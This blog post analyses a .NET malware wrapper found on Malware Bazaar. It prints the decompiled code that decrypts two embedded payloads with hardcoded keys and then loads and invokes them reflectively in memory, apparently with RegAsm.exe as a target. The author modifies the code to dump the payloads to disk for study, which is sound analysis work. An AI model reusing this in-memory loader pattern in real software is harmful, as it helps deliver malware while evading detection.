I was browsing through Malware Bazaar and came across a Win32 binary that hadn’t been tagged with anything specific, which piqued my interest.
Grabbing the sample revealed a binary with a Flash Player logo, and Detect It Easy identified it as a .NET binary.
I discovered a few interesting things by dropping the binary into dnSpy. The binary was a wrapper for 2 encrypted binaries bundled in the app’s resources, CLS.dll
and Xola.exe
The app itself was just a really simple SymmetricAlgorithm
decrypter that launches the decrypted binaries in a new thread
// Consol.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
//
// Original entry point of the wrapper (decompiler output, code reproduced unchanged).
// It loads the decrypted CLS.dll bytes (hpCGGsxnBfkpZyTC.jjjjjj) into the current
// AppDomain straight from memory - nothing is written to disk - then reflects into the
// type named by tttttt and the static method named by kkkk, and invokes it with two
// arguments: the RegAsm.exe path (locationstart) and the decrypted Xola.exe bytes (lastcode).
// What the invoked method does with those two arguments lives in CLS.dll, which is not
// shown here; the type/method name strings look obfuscated - TODO confirm against the
// decrypted DLL.
// Detection note: a small .NET stub doing Assembly/AppDomain.Load(byte[]) followed by a
// reflective Invoke is a common in-memory loader shape worth alerting on.
private static void Main()
{
    Thread.GetDomain().Load(hpCGGsxnBfkpZyTC.jjjjjj).GetType(hpCGGsxnBfkpZyTC.tttttt).GetMethod(hpCGGsxnBfkpZyTC.kkkk).Invoke(null, new object[] { hpCGGsxnBfkpZyTC.locationstart, hpCGGsxnBfkpZyTC.lastcode });
}
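using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using Consol;
using Microsoft.VisualBasic.CompilerServices;

// Token: 0x02000003 RID: 3
//
// Payload container of the wrapper (decompiled; member names are the sample's own).
// The static field initializers decrypt both embedded resources before any static member
// is first accessed, so merely referencing this class triggers the decryption.
public static class hpCGGsxnBfkpZyTC
{
    // Token: 0x06000003 RID: 3 RVA: 0x000020A8 File Offset: 0x000002A8
    /// <summary>
    /// Decrypts <paramref name="B"/> with a key derived from <paramref name="ikey"/>:
    /// key = SHA-256(UTF-16BE bytes of ikey), cipher = the framework's default
    /// <see cref="SymmetricAlgorithm"/> in ECB mode with default padding. ECB uses no IV,
    /// which is why none is ever set.
    /// </summary>
    /// <param name="B">Ciphertext (whole blocks, padded).</param>
    /// <param name="ikey">Passphrase whose UTF-16BE encoding is hashed to form the key.</param>
    /// <returns>The decrypted bytes.</returns>
    /// <exception cref="ArgumentNullException"><paramref name="B"/> or <paramref name="ikey"/> is null
    /// (e.g. the embedded resource was not found).</exception>
    /// <exception cref="CryptographicException">Typically a wrong key or corrupt/unpadded data.</exception>
    public static byte[] syam(byte[] B, string ikey)
    {
        if (B == null)
        {
            throw new ArgumentNullException(nameof(B));
        }
        if (ikey == null)
        {
            throw new ArgumentNullException(nameof(ikey));
        }

        // On .NET Framework the parameterless Create() resolves to Rijndael with a 128-bit block,
        // i.e. AES-256 for the 32-byte SHA-256 key; kept as-is so the output matches the sample.
        // NOTE(review): the parameterless Create() behaves differently on .NET Core/5+ - confirm the
        // target framework before re-hosting this decryptor.
        // Both objects are IDisposable; the original never disposed them.
        using (SymmetricAlgorithm cipher = SymmetricAlgorithm.Create())
        using (SHA256 sha256 = new SHA256CryptoServiceProvider())
        {
            cipher.Key = sha256.ComputeHash(Encoding.BigEndianUnicode.GetBytes(ikey));
            cipher.Mode = CipherMode.ECB;
            using (ICryptoTransform decryptor = cipher.CreateDecryptor())
            {
                return decryptor.TransformFinalBlock(B, 0, B.Length);
            }
        }
    }

    // Token: 0x06000004 RID: 4 RVA: 0x000020F4 File Offset: 0x000002F4
    /// <summary>
    /// Reads an embedded manifest resource of the wrapper assembly (the assembly that defines
    /// <see cref="Program"/>) fully into memory.
    /// </summary>
    /// <param name="filename">Manifest resource name, e.g. "CLS.dll".</param>
    /// <returns>The raw (still encrypted) resource bytes, or null when no such resource exists.</returns>
    public static byte[] ExtractResource(string filename)
    {
        using (Stream manifestResourceStream = typeof(Program).Assembly.GetManifestResourceStream(filename))
        {
            if (manifestResourceStream == null)
            {
                return null;
            }

            // The original issued a single Read() and trusted it to fill the whole buffer, but
            // Stream.Read may return fewer bytes than requested; copy until end-of-stream instead.
            using (MemoryStream buffer = new MemoryStream())
            {
                manifestResourceStream.CopyTo(buffer);
                return buffer.ToArray();
            }
        }
    }

    // Token: 0x04000001 RID: 1
    // Full path of RegAsm.exe inside the running CLR's directory; Main hands it to CLS.dll.
    // What CLS.dll does with it is not visible in this assembly.
    public static string locationstart = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe");

    // Token: 0x04000002 RID: 2
    // Decrypted Xola.exe (second embedded binary), passphrase "ZiZ".
    public static byte[] lastcode = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("Xola.exe"), "ZiZ");

    // Token: 0x04000003 RID: 3
    // Decrypted CLS.dll (the assembly Main loads reflectively), mixed-script passphrase.
    public static byte[] jjjjjj = hpCGGsxnBfkpZyTC.syam(hpCGGsxnBfkpZyTC.ExtractResource("CLS.dll"), "جc吉尺O");

    // Token: 0x04000004 RID: 4
    // Conversions.ToString on a string literal just yields the literal; this is the type name
    // Main looks up inside CLS.dll (looks obfuscated - TODO confirm against the decrypted DLL).
    public static string tttttt = Conversions.ToString("AZJCJfpyUsnAfJiyTLOifhLwQLhZwGQnrnOfJOnTpCiTDfBnyfynAAJxwhxnBJTLsQ.vrQBCQEUkZhMBwkZOZJQvLwhJxnADLpQChAphAJZfsMfxEiQLivpkxrTwsUwEkZMph");

    // Token: 0x04000005 RID: 5
    // Name of the static method Main invokes on that type.
    public static string kkkk = "yhxGkJfDMpTfiUkihOywMGfEhwUUQLLMnQOsEBvpnBEZUkExQhTyUQhJwkMJAisikT";
}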
To keep things super simple and easy, I’m going to modify the hpCGGsxnBfkpZyTC
class to include a dump()
function that will simply write the 2 binaries to the disk
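// Analyst helper (not part of the original sample): writes one decrypted payload to disk.
/// <summary>
/// Writes <paramref name="bytes"/> to <paramref name="directory"/> under the file name
/// <paramref name="fileName"/>, creating the directory if it does not exist. Only the
/// file-name component of <paramref name="fileName"/> is used (via Path.GetFileName, which
/// recognises the host platform's separators), so a resource name carrying directory
/// components or ".." cannot escape the dump directory.
/// </summary>
/// <param name="fileName">Output file name, e.g. the embedded resource name.</param>
/// <param name="bytes">Decrypted payload bytes.</param>
/// <param name="directory">Target directory; defaults to C:\Temp, matching the original helper.</param>
/// <exception cref="ArgumentNullException"><paramref name="bytes"/> is null (e.g. the resource was missing).</exception>
/// <exception cref="ArgumentException"><paramref name="fileName"/> is blank or has no file-name component.</exception>
public static void dump(string fileName, byte[] bytes, string directory = @"C:\Temp")
{
    if (bytes == null)
    {
        throw new ArgumentNullException(nameof(bytes));
    }
    if (string.IsNullOrWhiteSpace(fileName))
    {
        throw new ArgumentException("A file name is required.", nameof(fileName));
    }

    // Strip any directory part so the output always lands inside 'directory'.
    string safeName = Path.GetFileName(fileName);
    if (safeName.Length == 0)
    {
        throw new ArgumentException("File name has no file-name component.", nameof(fileName));
    }

    Directory.CreateDirectory(directory);
    File.WriteAllBytes(Path.Combine(directory, safeName), bytes);
}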
Then modify the entry point to dump the binaries instead of running them
using System;

namespace Consol
{
    // Token: 0x02000002 RID: 2
    // Analyst-modified entry point: instead of loading CLS.dll in memory and invoking it,
    // both decrypted payloads are written to disk through hpCGGsxnBfkpZyTC.dump.
    internal class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        // Touching hpCGGsxnBfkpZyTC runs its static initializers, which is where the
        // decryption of both resources actually happens.
        private static void Main()
        {
            string[] names = { "CLS.dll", "Xola.exe" };
            byte[][] payloads = { hpCGGsxnBfkpZyTC.jjjjjj, hpCGGsxnBfkpZyTC.lastcode };

            for (int i = 0; i < names.Length; i++)
            {
                hpCGGsxnBfkpZyTC.dump(names[i], payloads[i]);
            }
        }
    }
}
The result? 2 freshly decrypted malware samples in C:\Temp
I’ll dig into the 2 binaries in a part 2 sometime, but for now I’ll leave it there 🙂
References
https://bazaar.abuse.ch/sample/af45ff354aaf65c450cf147194b0f746243361b1385abe580ba10246fee9bd66/ CLS.dll - https://www.virustotal.com/gui/file/5026b4d5a20d9bd7f07f111adbfdcdffa3423e83a1f5a982c1c34ad610eaa678/details Xola.exe - https://www.virustotal.com/gui/file/f5e53da9273368bd53d088d573088865f80a318e9839a54214584c3eb98de003/details